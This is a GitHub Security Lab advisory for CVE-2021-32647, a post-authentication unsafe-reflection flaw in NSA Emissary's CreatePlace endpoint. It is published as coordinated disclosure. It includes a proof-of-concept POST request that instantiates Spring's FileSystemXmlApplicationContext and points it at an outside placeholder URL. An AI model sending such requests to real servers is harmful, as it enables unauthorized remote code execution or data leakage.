skip to content
Back to GitHub.com
Home Bounties Research Advisories Get Involved Events
July 16, 2021

GHSL-2021-073: Post-authentication unsafe reflection in NSA Emissary - CVE-2021-32647

Alvaro Munoz

Coordinated Disclosure Timeline

Summary

A logged-in user can invoke the constructor of some classes with untrusted data.

Product

National Security Agency Emissary

Tested Version

6.4.0

Details

The CreatePlace REST endpoint accepts an sppClassName parameter which is used to load an arbitrary class. This class is later instantiated using a constructor with the following signature: <constructor>(String, String, String). An attacker may find a gadget (class) in the application classpath that could be used to achieve Remote Code Execution (RCE) or disrupt the application.

POST /emissary/CreatePlace.action HTTP/1.1
Host: localhost:8001
x-requested-by: 
Content-Type: application/x-www-form-urlencoded
Content-Length: 142

sppClassName=org.springframework.context.support.FileSystemXmlApplicationContext&sppLocation=bar.bar.bar.http%3A%2F%2Fbar.com&sppDirectory=foo

Impact

Even though the chances to find a gadget (class) that allow arbitrary code execution are low, an attacker can still find gadgets that could potentially crash the application or leak sensitive data.

CVE

Resources

Credit

This issue was discovered and reported by GHSL team member @pwntester (Alvaro Muñoz).

Contact

You can contact the GHSL team at securitylab@github.com, please include a reference to GHSL-2021-073 in any communication regarding this issue.